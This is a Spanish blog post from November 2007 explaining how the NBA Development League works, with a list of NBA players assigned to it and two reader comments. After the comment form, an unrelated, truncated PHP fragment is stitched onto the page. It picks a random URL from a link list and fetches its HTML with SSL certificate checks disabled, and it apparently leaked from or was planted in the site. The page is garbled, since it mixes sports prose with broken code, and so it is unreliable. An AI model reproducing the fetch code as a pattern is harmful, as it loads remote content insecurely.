Hoy comienza la D-League

23 de November de 2007 por txusma

Hoy da comienzo con 5 partidos la D-League. Pero… ¿qué es y cómo funciona exactamente?

La National Basketball Association Development League o más simplemente la D-League es la liga de desarrollo organizada y promocionada por la NBA. Empezó su andadura en 2001 con 8 equipos y fue malviviendo sumida en el olvido hasta que en el 2005 el comisionado David Stern anunció un plan para potenciar esta liga y aumentar el número de equipos a 15, cada uno de ellos compartido por dos equipos de la NBA. En la temporada que empieza esta noche jugarán 14 equipos controlados cada uno por 2 ó 3 equipos de la NBA.

Las plantillas constan de 12 jugadores: en principio, 10 son jugadores de la misma D-League (éstos no firman ningún contrato con un equipo en particular sino con la liga misma) y 2 son jugadores NBA. Cada equipo NBA puede asignar a su equipo D-League los jugadores que quiera de primer y segundo año pero si más de 2 jugadores NBA son asignados a un equipo entonces hay que reducir el cupo de los jugadores de la D-League propiamente. Los equipos NBA pueden recuperar a sus jugadores tantas veces como quieran con la única condición que un mismo jugador NBA no puede ser enviado a la D-League más de 3 veces en la misma temporada.

Entre los jugadores propiamente de la D-League hay muchos que prefieren seguir buscando un hueco en la NBA en Estados Unidos en lugar de emigrar a otras ligas. Al principio de cada temporada se realiza un draft con los nuevos jugadores que entran a la liga, dando en principio a todos los equipos las mismas posibilidades de optar a los mejores jugadores. Por ejemplo este año los Colorado 14ers escogieron en primera posición a Eddie Gill, un trotamundos con 7 años de experiencia en la NBA que 5 días más tarde firmaba por los New Jersey Nets. Esta temporada también fueron elegidos en el draft otros jugadores ex-NBA como Darvin Ham o Jelani McCoy.

Con esta estructura el comisionado cree haber conseguido crear una verdadera liga de desarrollo que suple en los jóvenes su falta de experiencia y preparación, propiciada en muchas ocasiones por un prematuro salto a la NBA. Diversos jugadores que han pasado por la D-League han conseguido posteriormente un sitio en la NBA como por ejemplo, Matt Carroll (MVP en la 2004-2005), Bobby Simmons, Mikki Moore o Rafer Alston.

Aquí tenemos la lista de los jugadores NBA que de momento han sido asignados a equipos de la D-League:

  • Marcin Gortat (Orlando)
  • Ian Mahinmi (San Antonio)
  • Kosta Perovic (Golden State)
  • JamesOn Curry (Chicago)
  • Steve Novak (Houston)
  • Nick Fazekas (Dallas)
  • Kyrylo Fessenko (Utah)
  • Brandon Wallace (Boston)
  • Ramon Sessions (Milwaukee)
Comenta

2 comentarios a esta entrada

  1. Jabho dice:
    #1

    Pues navegando por lq página de la liga he visto que Kedrick Brown que en su día jugó en los Celtics, creo que fue final de primera ronda incluso, está hay jugando. Anda en 26 años y este chico en Europa podria hacerlo my bien, si quisiera.

    Creo que Gabe Pruitt, rookie de principio de 2ª ronda de Boston con buena pinta también se ha ido a la liga de desarrollo.

    Amir Jhonson que está levantando muchas expectativas en los Pistons también ha psado por aqui, Ilyasova,…

      Citar

  2. Dantley dice:
    #2

    Algunos jugadores han empezado rompiendo estadísticas. El mismo Gabe Pruitt ha comenzado dando que hablar, pero atentos también a otros dos que están en esta particular incubadora, JamesOn Curry y Ramon Sessions.

    Por cierto, viendo los nombres de los equipos uno duda si es una liga de verdad o una virtual (que a veces son más de verdad que las otras). Un equipo se llama Mad Ants, las hormigas locas. No llegan al nivel de originalidad de equipos como el TenemosUnProblema de Houston o el DeLana de New Jersey, pero se van acercando

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>